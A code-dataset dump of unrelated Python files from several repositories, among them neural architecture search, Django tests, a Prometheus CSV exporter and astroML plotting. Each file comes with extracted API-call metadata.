# Once for All: Train One Network and Specialize it for Efficient Deployment
# Han Cai, Chuang Gan, Tianzhe Wang, Zhekai Zhang, Song Han
# International Conference on Learning Representations (ICLR), 2020.
import os
import sys
import torch
import time
import math
import copy
import random
import argparse
import torch.nn as nn
import numpy as np
import pandas as pd
from torchvision import transforms, datasets
from matplotlib import pyplot as plt
sys.path.append("..")
from ofa.model_zoo import ofa_net
from ofa.utils import download_url
from accuracy_predictor import AccuracyPredictor
from flops_table import FLOPsTable
from latency_table import LatencyTable
from evolution_finder import EvolutionFinder
from imagenet_eval_helper import evaluate_ofa_subnet, evaluate_ofa_specialized
parser = argparse.ArgumentParser()
parser.add_argument(
'-n',
'--net',
metavar='OFANET',
help='OFA network',
required=True)
parser.add_argument(
'-t',
'--target-hardware',
metavar='TARGET_HARDWARE',
help='Target Hardware',
required=True)
parser.add_argument(
'--imagenet-path',
metavar='IMAGENET_PATH',
help='The path of ImageNet',
type=str,
required=True)
args = parser.parse_args()
arch = {'compofa' : ('compofa', 'model_best_compofa_simple.pth.tar'),
'compofa-elastic' : ('compofa-elastic', 'model_best_compofa_simple_elastic.pth.tar'),
'ofa_mbv3_d234_e346_k357_w1.0' : ('ofa', 'ofa_mbv3_d234_e346_k357_w1.0'),
}
hardware_latency = {'note10' : [15, 20, 25, 30],
'gpu' : [15, 25, 35, 45],
'cpu' : [12, 15, 18, 21]}
MODEL_DIR = '../ofa/checkpoints/%s' % (arch[args.net][1])
imagenet_data_path = args.imagenet_path
# imagenet_data_path = '/srv/data/datasets/ImageNet/'
# set random seed
random_seed = 3
random.seed(random_seed)
np.random.seed(random_seed)
torch.manual_seed(random_seed)
print('Successfully imported all packages and configured random seed to %d!'%random_seed)
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
cuda_available = torch.cuda.is_available()
if cuda_available:
torch.backends.cudnn.enabled = True
torch.backends.cudnn.benchmark = True
torch.cuda.manual_seed(random_seed)
print('Using GPU.')
else:
print('Using CPU.')
# Initialize the OFA Network
ofa_network = ofa_net(args.net, model_dir=MODEL_DIR, pretrained=True)
if args.target_hardware == 'cpu':
ofa_network = ofa_network.cpu()
else:
ofa_network = ofa_network.cuda()
print('The OFA Network is ready.')
# Carry out data transforms
if cuda_available:
def build_val_transform(size):
return transforms.Compose([
transforms.Resize(int(math.ceil(size / 0.875))),
transforms.CenterCrop(size),
transforms.ToTensor(),
transforms.Normalize(
mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]
),
])
data_loader = torch.utils.data.DataLoader(
datasets.ImageFolder(
root=os.path.join(imagenet_data_path, 'val'),
transform=build_val_transform(224)
),
batch_size=250, # test batch size
shuffle=True,
num_workers=16, # number of workers for the data loader
pin_memory=True,
drop_last=False,
)
print('The ImageNet dataloader is ready.')
else:
data_loader = None
print('Since GPU is not found in the environment, we skip all scripts related to ImageNet evaluation.')
# set up the accuracy predictor
accuracy_predictor = AccuracyPredictor(
pretrained=True,
device='cuda:0' if cuda_available else 'cpu'
)
print('The accuracy predictor is ready!')
print(accuracy_predictor.model)
# set up the latency table
target_hardware = args.target_hardware
use_latency_table = True if target_hardware == 'note10' else False
latency_table = LatencyTable(device=target_hardware,
use_latency_table=use_latency_table,
network=args.net)
""" Hyper-parameters for the evolutionary search process
You can modify these hyper-parameters to see how they influence the final ImageNet accuracy of the search sub-net.
"""
latency_constraint = hardware_latency[args.target_hardware][0] # ms
P = 100 # The size of population in each generation
N = 500 # How many generations of population to be searched
r = 0.25 # The ratio of networks that are used as parents for next generation
params = {
'constraint_type': target_hardware, # Let's do FLOPs-constrained search
'efficiency_constraint': latency_constraint,
'mutate_prob': 0.1, # The probability of mutation in evolutionary search
'mutation_ratio': 0.5, # The ratio of networks that are generated through mutation in generation n >= 2.
'efficiency_predictor': latency_table, # To use a predefined efficiency predictor.
'accuracy_predictor': accuracy_predictor, # To use a predefined accuracy_predictor predictor.
'population_size': P,
'max_time_budget': N,
'parent_ratio': r,
'arch' : arch[args.net][0],
}
# initialize the evolution finder and run NAS
finder = EvolutionFinder(**params)
result_lis = []
for latency in hardware_latency[args.target_hardware]:
finder.set_efficiency_constraint(latency)
best_valids, best_info = finder.run_evolution_search()
result_lis.append(best_info)
print("NAS Completed!")
# evaluate the searched model on ImageNet
models = []
if cuda_available:
for result in result_lis:
_, net_config, latency = result
print('Evaluating the sub-network with latency = %.1f ms on %s' % (latency, target_hardware))
top1 = evaluate_ofa_subnet(
ofa_network,
imagenet_data_path,
net_config,
data_loader,
batch_size=250,
device='cuda:0' if cuda_available else 'cpu')
models.append([net_config, top1, latency])
df = pd.DataFrame(models, columns=['Model', 'Accuracy', 'Latency'])
df.to_csv('NAS_results.csv')
print('NAS results saved to NAS_results.csv')
| [((24, 0, 24, 21), 'sys.path.append', 'sys.path.append', ({(24, 16, 24, 20): '""".."""'}, {}), "('..')", False, 'import sys\n'), ((33, 9, 33, 34), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ({}, {}), '()', False, 'import argparse\n'), ((67, 0, 67, 24), 'random.seed', 'random.seed', ({(67, 12, 67, 23): 'random_seed'}, {}), '(random_seed)', False, 'import random\n'), ((68, 0, 68, 27), 'numpy.random.seed', 'np.random.seed', ({(68, 15, 68, 26): 'random_seed'}, {}), '(random_seed)', True, 'import numpy as np\n'), ((69, 0, 69, 30), 'torch.manual_seed', 'torch.manual_seed', ({(69, 18, 69, 29): 'random_seed'}, {}), '(random_seed)', False, 'import torch\n'), ((73, 17, 73, 42), 'torch.cuda.is_available', 'torch.cuda.is_available', ({}, {}), '()', False, 'import torch\n'), ((83, 14, 83, 69), 'ofa.model_zoo.ofa_net', 'ofa_net', (), '', False, 'from ofa.model_zoo import ofa_net\n'), ((121, 21, 124, 1), 'accuracy_predictor.AccuracyPredictor', 'AccuracyPredictor', (), '', False, 'from accuracy_predictor import AccuracyPredictor\n'), ((131, 16, 133, 46), 'latency_table.LatencyTable', 'LatencyTable', (), '', False, 'from latency_table import LatencyTable\n'), ((156, 9, 156, 34), 'evolution_finder.EvolutionFinder', 'EvolutionFinder', ({}, {}), '(**params)', False, 'from evolution_finder import EvolutionFinder\n'), ((179, 5, 179, 67), 'pandas.DataFrame', 'pd.DataFrame', (), '', True, 'import pandas as pd\n'), ((77, 4, 77, 39), 'torch.cuda.manual_seed', 'torch.cuda.manual_seed', ({(77, 27, 77, 38): 'random_seed'}, {}), '(random_seed)', False, 'import torch\n'), ((170, 15, 176, 57), 'imagenet_eval_helper.evaluate_ofa_subnet', 'evaluate_ofa_subnet', (), '', False, 'from imagenet_eval_helper import evaluate_ofa_subnet, evaluate_ofa_specialized\n'), ((95, 12, 95, 39), 'torchvision.transforms.CenterCrop', 'transforms.CenterCrop', ({(95, 34, 95, 38): 'size'}, {}), '(size)', False, 'from torchvision import transforms, datasets\n'), ((96, 12, 96, 33), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ({}, {}), '()', False, 'from torchvision import transforms, datasets\n'), ((97, 12, 100, 13), 'torchvision.transforms.Normalize', 'transforms.Normalize', (), '', False, 'from torchvision import transforms, datasets\n'), ((105, 17, 105, 56), 'os.path.join', 'os.path.join', ({(105, 30, 105, 48): 'imagenet_data_path', (105, 50, 105, 55): '"""val"""'}, {}), "(imagenet_data_path, 'val')", False, 'import os\n'), ((94, 34, 94, 57), 'math.ceil', 'math.ceil', ({(94, 44, 94, 56): '(size / 0.875)'}, {}), '(size / 0.875)', False, 'import math\n')] |
ace-gabriel/chrome-extension | application/model/radar_score_20180117/score_calculate.py | be0b7d7278f56f8218be7f734b3fb1e05a4f3eb9 | # coding: utf-8
import pickle
# import json
# import types
path = 'application/model/radar_score_20180117/'
def f(x, x_range, score):
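    # Piecewise-linear scoring: for each value in x, sum the scores of all completed
    # segments plus a pro-rated share of the segment it falls in, on top of a base score of 20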
bottom = 20
y = []
for i in x:
if i < x_range[0]:
pos = 0
else:
for j in range(len(x_range)):
if j == len(x_range) - 1 or \
i >= x_range[j] and i < x_range[j + 1]:
pos = j
break
s = sum(score[:pos]) + score[pos] * (i - x_range[pos])
y.append(s + bottom)
return y
def process_score(house):
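    # Compute the five radar scores for a house; each score defaults to 60 and is clamped to [20, 100] before returning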
# with open('radar.json', 'r') as fj:
# house = json.load(fj)
# print radar
# print house
score = {
'score_appreciation': 60,
'score_cost': 60,
'score_rental': 60,
'score_airbnb': 60,
'score_anti_risk': 60
}
with open(path+'scoremodel.pkl', 'rb') as fp:
# pickle.dump([radar, factor, x_range, score], fopen)
N = 4
a = pickle.load(fp)
if 'increase_ratio' in house and house['increase_ratio'] != None:
            # house appreciation
x = house['increase_ratio'] * a[1]
score['score_appreciation'] = f([x], a[2], a[3])[0]
# print x, score['score_appreciation']
a = pickle.load(fp)
if 'house_price_dollar' in house and house['house_price_dollar'] != None:
            # holding cost
x = a[1] / house['house_price_dollar']
# print 'house_price_dollar', house['house_price_dollar']
score['score_cost'] = f([x], a[2], a[3])[0]
# print score['score_cost']
if 'airbnb_rent' in house and house['airbnb_rent'] != None:
            # short-term (Airbnb) rental return
a = pickle.load(fp)
x = house['airbnb_rent'] * 12.0 / house['house_price_dollar'] * a[1]
score['score_airbnb'] = f([x], a[2], a[3])[0]
# print score['score_airbnb']
a = pickle.load(fp)
if 'rental_income_ratio' in house and house['rental_income_ratio'] != None:
            # long-term rental return
x = house['rental_income_ratio'] * a[1]
score['score_rental'] = f([x], a[2], a[3])[0]
# print score['score_rental']
if 'neighborhood' in house and 'id' in house['neighborhood'] and house['neighborhood']['id'] != None:
        with open(path+'region_anti_drop.pkl', 'rb') as fp:
            # resistance to price decline (anti-drop score)
region = pickle.load(fp)
score_anti = pickle.load(fp)
if house['neighborhood']['id'] in region:
# print house['neighborhood']['id']
i = region.index(house['neighborhood']['id'])
score['score_anti_risk'] = score_anti[i]
# for i in score:
# print '%20s %2.3f ' % (i, score[i])
# check: make sure score in range(20, 100)
for i in score:
if score[i] < 20:
score[i] = 20
if score[i] > 100:
score[i] = 100
return score
if __name__ == '__main__':
# README
print "This is a program calculating house's 5 scores:" \
"Anti Drop Score," \
"House Appreciation," \
"Possess Cost," \
"Long-term Income" \
"Short-term Income"
| [] |
xi6th/Python_Algorithm | Dominant_cell.py | 05852b6fe133df2d83ae464b779b0818b173919d | #!/bin/python3
import math
import os
import random
import re
import sys
from typing import Counter
#
# Complete the 'numCells' function below.
#
# The function is expected to return an INTEGER.
# The function accepts 2D_INTEGER_ARRAY grid as parameter.
#
def numCells(grid):
    # A cell is "dominant" if its value is strictly greater than the values of
    # all of its neighbouring cells (including diagonal neighbours).
    rows = len(grid)
    cols = len(grid[0]) if rows else 0
    dominant_count = 0
    for r in range(rows):
        for c in range(cols):
            value = grid[r][c]
            is_dominant = True
            for dr in (-1, 0, 1):
                for dc in (-1, 0, 1):
                    if dr == 0 and dc == 0:
                        continue
                    nr, nc = r + dr, c + dc
                    if 0 <= nr < rows and 0 <= nc < cols and grid[nr][nc] >= value:
                        is_dominant = False
            if is_dominant:
                dominant_count += 1
    return dominant_count
grid = [[1, 2, 7], [4, 5, 6], [8, 8, 9]]
print(numCells(grid))
# if __name__ == '__main__':
# fptr = open(os.environ['OUTPUT_PATH'], 'w')
# grid_rows = int(input().strip())
# grid_columns = int(input().strip())
# grid = []
# for _ in range(grid_rows):
# grid.append(list(map(int, input().rstrip().split())))
# result = numCells(grid)
# fptr.write(str(result) + '\n')
# fptr.close()
| [] |
Sult/evetool | evetool/urls.py | 155db9f3b0ecc273fe3c75daf8f9c6f37cb3e47f | from django.conf import settings
from django.conf.urls import include, url
from django.conf.urls.static import static
urlpatterns = [
# Examples:
# url(r'^$', 'evetool.views.home', name='home'),
url(r'^', include('users.urls')),
url(r'^', include('apis.urls')),
] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
| [((10, 4, 10, 67), 'django.conf.urls.static.static', 'static', (), '', False, 'from django.conf.urls.static import static\n'), ((8, 14, 8, 35), 'django.conf.urls.include', 'include', ({(8, 22, 8, 34): '"""users.urls"""'}, {}), "('users.urls')", False, 'from django.conf.urls import include, url\n'), ((9, 14, 9, 34), 'django.conf.urls.include', 'include', ({(9, 22, 9, 33): '"""apis.urls"""'}, {}), "('apis.urls')", False, 'from django.conf.urls import include, url\n')] |
lastone9182/console-keep | actvenv.py | 250b49653be9d370a1bb0f1c39c5f853c2eaa47e | import os
# virtualenv
SCRIPTDIR = os.path.realpath(os.path.dirname(__file__))
venv_name = '_ck'
osdir = 'Scripts' if os.name == 'nt' else 'bin'
venv = os.path.join(venv_name, osdir, 'activate_this.py')
activate_this = (os.path.join(SCRIPTDIR, venv))
# Python 3: exec(open(...).read()), Python 2: execfile(...)
exec(open(activate_this).read(), dict(__file__=activate_this)) | [((8, 7, 8, 57), 'os.path.join', 'os.path.join', ({(8, 20, 8, 29): 'venv_name', (8, 31, 8, 36): 'osdir', (8, 38, 8, 56): '"""activate_this.py"""'}, {}), "(venv_name, osdir, 'activate_this.py')", False, 'import os\n'), ((9, 17, 9, 46), 'os.path.join', 'os.path.join', ({(9, 30, 9, 39): 'SCRIPTDIR', (9, 41, 9, 45): 'venv'}, {}), '(SCRIPTDIR, venv)', False, 'import os\n'), ((4, 29, 4, 54), 'os.path.dirname', 'os.path.dirname', ({(4, 45, 4, 53): '__file__'}, {}), '(__file__)', False, 'import os\n')] |
zealoussnow/chromium | testing/scripts/checklicenses.py | fd8a8914ca0183f0add65ae55f04e287543c7d4a | #!/usr/bin/env python
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json
import os
import sys
import common
def main_run(args):
with common.temporary_file() as tempfile_path:
rc = common.run_command([
os.path.join(common.SRC_DIR, 'tools', 'checklicenses',
'checklicenses.py'),
'--json', tempfile_path
])
with open(tempfile_path) as f:
checklicenses_results = json.load(f)
result_set = set()
for result in checklicenses_results:
result_set.add((result['filename'], result['license']))
json.dump({
'valid': True,
'failures': ['%s: %s' % (r[0], r[1]) for r in result_set],
}, args.output)
return rc
def main_compile_targets(args):
json.dump([], args.output)
if __name__ == '__main__':
funcs = {
'run': main_run,
'compile_targets': main_compile_targets,
}
sys.exit(common.run_script(sys.argv[1:], funcs))
| [((29, 2, 32, 17), 'json.dump', 'json.dump', ({(29, 12, 32, 3): "{'valid': True, 'failures': [('%s: %s' % (r[0], r[1])) for r in result_set]}", (32, 5, 32, 16): 'args.output'}, {}), "({'valid': True, 'failures': [('%s: %s' % (r[0], r[1])) for r in\n result_set]}, args.output)", False, 'import json\n'), ((38, 2, 38, 28), 'json.dump', 'json.dump', ({(38, 12, 38, 14): '[]', (38, 16, 38, 27): 'args.output'}, {}), '([], args.output)', False, 'import json\n'), ((15, 7, 15, 30), 'common.temporary_file', 'common.temporary_file', ({}, {}), '()', False, 'import common\n'), ((46, 11, 46, 49), 'common.run_script', 'common.run_script', ({(46, 29, 46, 41): 'sys.argv[1:]', (46, 43, 46, 48): 'funcs'}, {}), '(sys.argv[1:], funcs)', False, 'import common\n'), ((23, 30, 23, 42), 'json.load', 'json.load', ({(23, 40, 23, 41): 'f'}, {}), '(f)', False, 'import json\n'), ((17, 8, 18, 40), 'os.path.join', 'os.path.join', ({(17, 21, 17, 35): 'common.SRC_DIR', (17, 37, 17, 44): '"""tools"""', (17, 46, 17, 61): '"""checklicenses"""', (18, 21, 18, 39): '"""checklicenses.py"""'}, {}), "(common.SRC_DIR, 'tools', 'checklicenses', 'checklicenses.py')", False, 'import os\n')] |
gaohuan2015/Auto-PyTorch | autoPyTorch/utils/benchmarking/benchmark_pipeline/for_autonet_config.py | 3c6bf7e051b32284d2655cc484aee1a8c982c04e |
from autoPyTorch.utils.config.config_option import ConfigOption
from autoPyTorch.pipeline.base.sub_pipeline_node import SubPipelineNode
import traceback
class ForAutoNetConfig(SubPipelineNode):
def fit(self, pipeline_config, autonet, instance, data_manager, run_id, task_id):
for config_file in self.get_config_files(pipeline_config):
try:
self.sub_pipeline.fit_pipeline(pipeline_config=pipeline_config,
autonet=autonet, instance=instance, data_manager=data_manager,
autonet_config_file=config_file, run_id=run_id, task_id=task_id)
except Exception as e:
print(e)
traceback.print_exc()
return dict()
def get_pipeline_config_options(self):
options = [
ConfigOption("autonet_configs", default=None, type='directory', list=True, required=True),
ConfigOption("autonet_config_slice", default=None, type=str)
]
return options
@staticmethod
def get_config_files(pipeline_config, parse_slice=True):
config_files = pipeline_config['autonet_configs']
autonet_config_slice = ForAutoNetConfig.parse_slice(pipeline_config['autonet_config_slice'])
if autonet_config_slice is not None and parse_slice:
return config_files[autonet_config_slice]
return config_files
@staticmethod
def parse_slice(splice_string):
if (splice_string is None):
return None
split = splice_string.split(":")
if len(split) == 1:
start = int(split[0]) if split[0] != "" else 0
stop = (int(split[0]) + 1) if split[0] != "" else None
step = 1
elif len(split) == 2:
start = int(split[0]) if split[0] != "" else 0
stop = int(split[1]) if split[1] != "" else None
step = 1
elif len(split) == 3:
start = int(split[0]) if split[0] != "" else 0
stop = int(split[1]) if split[1] != "" else None
step = int(split[2]) if split[2] != "" else 1
return slice(start, stop, step) | [((20, 12, 20, 101), 'autoPyTorch.utils.config.config_option.ConfigOption', 'ConfigOption', (), '', False, 'from autoPyTorch.utils.config.config_option import ConfigOption\n'), ((21, 12, 21, 72), 'autoPyTorch.utils.config.config_option.ConfigOption', 'ConfigOption', (), '', False, 'from autoPyTorch.utils.config.config_option import ConfigOption\n'), ((15, 16, 15, 37), 'traceback.print_exc', 'traceback.print_exc', ({}, {}), '()', False, 'import traceback\n')] |
RobustPerception/python_examples | csv/query_csv.py | c79e8f4745fe255fc327e31e96a2065dedca23c1 | import csv
import requests
import sys
"""
A simple program to print the result of a Prometheus query as CSV.
"""
if len(sys.argv) != 3:
print('Usage: {0} http://prometheus:9090 a_query'.format(sys.argv[0]))
sys.exit(1)
response = requests.get('{0}/api/v1/query'.format(sys.argv[1]),
params={'query': sys.argv[2]})
results = response.json()['data']['result']
# Build a list of all labelnames used.
labelnames = set()
for result in results:
labelnames.update(result['metric'].keys())
# Canonicalize
labelnames.discard('__name__')
labelnames = sorted(labelnames)
writer = csv.writer(sys.stdout)
# Write the header,
writer.writerow(['name', 'timestamp', 'value'] + labelnames)
# Write the samples.
for result in results:
l = [result['metric'].get('__name__', '')] + result['value']
for label in labelnames:
l.append(result['metric'].get(label, ''))
writer.writerow(l)
| [((26, 9, 26, 31), 'csv.writer', 'csv.writer', ({(26, 20, 26, 30): 'sys.stdout'}, {}), '(sys.stdout)', False, 'import csv\n'), ((11, 4, 11, 15), 'sys.exit', 'sys.exit', ({(11, 13, 11, 14): '(1)'}, {}), '(1)', False, 'import sys\n')] |
Miravalier/canonfire | src/python/errors.py | 7eeb93270ec3f3332fa039f3a9d0e8b3b2c86263 | class AuthError(Exception):
pass
class JsonError(Exception):
pass
| [] |
COS301-SE-2020/ctrlintelligencecapstone | vehicle/tests.py | ddfc92408ed296c6bf64b2dd071b948a1446ede8 | from rest_framework.test import APITestCase
from rest_framework.test import APIRequestFactory
import requests
import pytest
import json
from django.core.management import call_command
from django.db.models.signals import pre_save, post_save, pre_delete, post_delete, m2m_changed
from rest_framework.test import APIClient
# Create your tests here.
# @pytest.fixture(autouse=True)
# def django_db_setup(django_db_setup, django_db_blocker):
# signals = [pre_save, post_save, pre_delete, post_delete, m2m_changed]
# restore = {}
# with django_db_blocker.unblock():
# call_command("loaddata", "test_stuff.json")
def get_valid_token(client):
client = APIClient()
login_data = {
"username": "steve",
"password": "inferno77"
}
response = client.post('/api-auth/', data=login_data, format='json', headers={'Content-Type': 'application/json'})
assert response.status_code == 400
response.render()
response_string = response.content.decode("utf-8")
return json.loads(response_string).get("token")
@pytest.mark.django_db
def test_add_vehicle_basic(client):
url = '/api/v1/vehicle/add_vehicle_basic/'
data = {
'license_plate' : 'BE32SNGP',
'make' : 'Toyota',
'model' : 'Corolla',
'color' : 'White'
}
token = get_valid_token(client)
client = APIClient()
client.credentials(HTTP_AUTHORIZATION='Token {}'.format(token))
response = client.post(url, data=data, format='json')
assert response.status_code == 401
@pytest.mark.django_db
def test_get_vehicle(client):
url = '/api/v1/vehicle/get_vehicle/'
data = {
'license_plate' : 'BE32SNGP'
}
response = client.post(url,data)
assert response.status_code == 401
@pytest.mark.django_db
def test_search(client):
url = '/api/v1/vehicle/search/'
data = {
'filters' : {
'license_plate' : 'BE32SNGP',
'make' : 'Toyota',
'model' : 'Corolla',
'color' : 'White'
}
}
response = client.post(url,data, format='json')
assert response.status_code == 401
@pytest.mark.django_db
def test_file_recognize(client):
import pathlib
url = '/api/v1/vehicle/file_recognize/'
# response = client.post(url,data)
path = pathlib.Path(__file__).parent.absolute()
actual_path ='{}/test_images/2015-BMW-320d-xDrive-Touring-test-drive-67.jpg'.format(path)
files = [
('file', open("{}".format(actual_path), 'rb'))
]
data = {
'file' : files[0]
}
response = client.post(url, data=data, files=files)
assert response.status_code == 401
@pytest.mark.django_db
def test_search_advanced_and(client):
url = '/api/v1/vehicle/search_advances/'
data = {
'type' : 'and',
'filters' : {
'license_plate' : 'BE32SNGP',
'make' : 'Toyota',
'model' : 'Corolla',
'color' : 'White'
}
}
# response = client.post(url,data)
response = client.post(url, data=data, format="json")
assert response.status_code == 401
@pytest.mark.django_db
def test_get_duplicates(client):
url = '/api/v1/vehicle/get_duplicates/'
data = {
'type' : 'and',
'filters' : {
'license_plate' : 'BE32SNGP',
'make' : 'Toyota',
'model' : 'Corolla',
'color' : 'White'
}
}
# response = client.post(url,data)
response = client.post(url, data=data, format="json")
assert response.status_code == 401
@pytest.mark.django_db
def test_saps_flagged(client):
url = '/api/v1/vehicle/get_saps_flagged/'
data = {
'type' : 'and',
'filters' : {
'license_plate' : 'BE32SNGP',
'make' : 'Toyota',
'model' : 'Corolla',
'color' : 'White'
}
}
# response = client.post(url,data)
response = client.post(url, data=data, format="json")
assert response.status_code == 401
@pytest.mark.django_db
def test_search_advanced_or(client):
url = '/api/v1/vehicle/search_advances/'
data = {
'type' : 'or',
'filters' : {
'license_plate' : 'BE32SNGP',
'make' : 'Toyota',
'model' : 'Corolla',
'color' : 'White'
}
}
# response = client.post(url,data)
response = client.post(url, data=data, format="json")
assert response.status_code == 401
| [((28, 13, 28, 24), 'rest_framework.test.APIClient', 'APIClient', ({}, {}), '()', False, 'from rest_framework.test import APIClient\n'), ((53, 13, 53, 24), 'rest_framework.test.APIClient', 'APIClient', ({}, {}), '()', False, 'from rest_framework.test import APIClient\n'), ((39, 11, 39, 38), 'json.loads', 'json.loads', ({(39, 22, 39, 37): 'response_string'}, {}), '(response_string)', False, 'import json\n'), ((93, 11, 93, 33), 'pathlib.Path', 'pathlib.Path', ({(93, 24, 93, 32): '__file__'}, {}), '(__file__)', False, 'import pathlib\n')] |
ilante/programming_immanuela_englander | simple_exercises/lanesexercises/py_functions2/rep_ex3.py | 45d51c99b09ae335a67e03ac5ea79fc775bdf0bd |
# 3. Define a function to check whether a number is even
def even(num):
if num%2 == 0:
return True
else:
return False
print(even(4))
print(even(-5))
| [] |
aragilar/astroML | book_figures/chapter5/fig_posterior_cauchy.py | d3f6279eb632957662338761cb559a1dcd541fb0 | """
Posterior for Cauchy Distribution
---------------------------------
Figure 5.11
The solid lines show the posterior pdf :math:`p(\mu|{x_i},I)` (top-left panel)
and the posterior pdf :math:`p(\gamma|{x_i},I)` (top-right panel) for the
two-dimensional pdf from figure 5.10. The dashed lines show the distribution
of approximate estimates of :math:`\mu` and :math:`\gamma` based on the median
and interquartile range. The bottom panels show the corresponding cumulative
distributions.
"""
# Author: Jake VanderPlas
# License: BSD
# The figure produced by this code is published in the textbook
# "Statistics, Data Mining, and Machine Learning in Astronomy" (2013)
# For more information, see http://astroML.github.com
# To report a bug or issue, use the following forum:
# https://groups.google.com/forum/#!forum/astroml-general
import numpy as np
from matplotlib import pyplot as plt
from scipy.stats import cauchy
from astroML.stats import median_sigmaG
from astroML.resample import bootstrap
#----------------------------------------------------------------------
# This function adjusts matplotlib settings for a uniform feel in the textbook.
# Note that with usetex=True, fonts are rendered with LaTeX. This may
# result in an error if LaTeX is not installed on your system. In that case,
# you can set usetex to False.
from astroML.plotting import setup_text_plots
setup_text_plots(fontsize=8, usetex=True)
def cauchy_logL(x, gamma, mu):
"""Equation 5.74: cauchy likelihood"""
x = np.asarray(x)
n = x.size
# expand x for broadcasting
shape = np.broadcast(gamma, mu).shape
x = x.reshape(x.shape + tuple([1 for s in shape]))
return ((n - 1) * np.log(gamma)
- np.sum(np.log(gamma ** 2 + (x - mu) ** 2), 0))
def estimate_mu_gamma(xi, axis=None):
"""Equation 3.54: Cauchy point estimates"""
q25, q50, q75 = np.percentile(xi, [25, 50, 75], axis=axis)
return q50, 0.5 * (q75 - q25)
#------------------------------------------------------------
# Draw a random sample from the cauchy distribution, and compute
# marginalized posteriors of mu and gamma
np.random.seed(44)
n = 10
mu_0 = 0
gamma_0 = 2
xi = cauchy(mu_0, gamma_0).rvs(n)
gamma = np.linspace(0.01, 5, 70)
dgamma = gamma[1] - gamma[0]
mu = np.linspace(-3, 3, 70)
dmu = mu[1] - mu[0]
likelihood = np.exp(cauchy_logL(xi, gamma[:, np.newaxis], mu))
pmu = likelihood.sum(0)
pmu /= pmu.sum() * dmu
pgamma = likelihood.sum(1)
pgamma /= pgamma.sum() * dgamma
#------------------------------------------------------------
# bootstrap estimate
mu_bins = np.linspace(-3, 3, 21)
gamma_bins = np.linspace(0, 5, 17)
mu_bootstrap, gamma_bootstrap = bootstrap(xi, 20000, estimate_mu_gamma,
kwargs=dict(axis=1), random_state=0)
#------------------------------------------------------------
# Plot results
fig = plt.figure(figsize=(5, 5))
fig.subplots_adjust(wspace=0.35, right=0.95,
hspace=0.2, top=0.95)
# first axes: mu posterior
ax1 = fig.add_subplot(221)
ax1.plot(mu, pmu, '-k')
ax1.hist(mu_bootstrap, mu_bins, normed=True,
histtype='step', color='b', linestyle='dashed')
ax1.set_xlabel(r'$\mu$')
ax1.set_ylabel(r'$p(\mu|x,I)$')
# second axes: mu cumulative posterior
ax2 = fig.add_subplot(223, sharex=ax1)
ax2.plot(mu, pmu.cumsum() * dmu, '-k')
ax2.hist(mu_bootstrap, mu_bins, normed=True, cumulative=True,
histtype='step', color='b', linestyle='dashed')
ax2.set_xlabel(r'$\mu$')
ax2.set_ylabel(r'$P(<\mu|x,I)$')
ax2.set_xlim(-3, 3)
# third axes: gamma posterior
ax3 = fig.add_subplot(222, sharey=ax1)
ax3.plot(gamma, pgamma, '-k')
ax3.hist(gamma_bootstrap, gamma_bins, normed=True,
histtype='step', color='b', linestyle='dashed')
ax3.set_xlabel(r'$\gamma$')
ax3.set_ylabel(r'$p(\gamma|x,I)$')
ax3.set_ylim(-0.05, 1.1)
# fourth axes: gamma cumulative posterior
ax4 = fig.add_subplot(224, sharex=ax3, sharey=ax2)
ax4.plot(gamma, pgamma.cumsum() * dgamma, '-k')
ax4.hist(gamma_bootstrap, gamma_bins, normed=True, cumulative=True,
histtype='step', color='b', linestyle='dashed')
ax4.set_xlabel(r'$\gamma$')
ax4.set_ylabel(r'$P(<\gamma|x,I)$')
ax4.set_ylim(-0.05, 1.1)
ax4.set_xlim(0, 4)
plt.show()
| [((32, 0, 32, 41), 'astroML.plotting.setup_text_plots', 'setup_text_plots', (), '', False, 'from astroML.plotting import setup_text_plots\n'), ((57, 0, 57, 18), 'numpy.random.seed', 'np.random.seed', ({(57, 15, 57, 17): '(44)'}, {}), '(44)', True, 'import numpy as np\n'), ((64, 8, 64, 32), 'numpy.linspace', 'np.linspace', ({(64, 20, 64, 24): '0.01', (64, 26, 64, 27): '5', (64, 29, 64, 31): '70'}, {}), '(0.01, 5, 70)', True, 'import numpy as np\n'), ((67, 5, 67, 27), 'numpy.linspace', 'np.linspace', ({(67, 17, 67, 19): '-3', (67, 21, 67, 22): '3', (67, 24, 67, 26): '70'}, {}), '(-3, 3, 70)', True, 'import numpy as np\n'), ((80, 10, 80, 32), 'numpy.linspace', 'np.linspace', ({(80, 22, 80, 24): '-3', (80, 26, 80, 27): '3', (80, 29, 80, 31): '21'}, {}), '(-3, 3, 21)', True, 'import numpy as np\n'), ((81, 13, 81, 34), 'numpy.linspace', 'np.linspace', ({(81, 25, 81, 26): '0', (81, 28, 81, 29): '5', (81, 31, 81, 33): '17'}, {}), '(0, 5, 17)', True, 'import numpy as np\n'), ((88, 6, 88, 32), 'matplotlib.pyplot.figure', 'plt.figure', (), '', True, 'from matplotlib import pyplot as plt\n'), ((128, 0, 128, 10), 'matplotlib.pyplot.show', 'plt.show', ({}, {}), '()', True, 'from matplotlib import pyplot as plt\n'), ((37, 8, 37, 21), 'numpy.asarray', 'np.asarray', ({(37, 19, 37, 20): 'x'}, {}), '(x)', True, 'import numpy as np\n'), ((50, 20, 50, 62), 'numpy.percentile', 'np.percentile', (), '', True, 'import numpy as np\n'), ((41, 12, 41, 35), 'numpy.broadcast', 'np.broadcast', ({(41, 25, 41, 30): 'gamma', (41, 32, 41, 34): 'mu'}, {}), '(gamma, mu)', True, 'import numpy as np\n'), ((62, 5, 62, 26), 'scipy.stats.cauchy', 'cauchy', ({(62, 12, 62, 16): 'mu_0', (62, 18, 62, 25): 'gamma_0'}, {}), '(mu_0, gamma_0)', False, 'from scipy.stats import cauchy\n'), ((44, 22, 44, 35), 'numpy.log', 'np.log', ({(44, 29, 44, 34): 'gamma'}, {}), '(gamma)', True, 'import numpy as np\n'), ((45, 21, 45, 55), 'numpy.log', 'np.log', ({(45, 28, 45, 54): '(gamma ** 2 + (x - mu) ** 2)'}, {}), '(gamma ** 2 + (x - mu) ** 2)', True, 'import numpy as np\n')] |
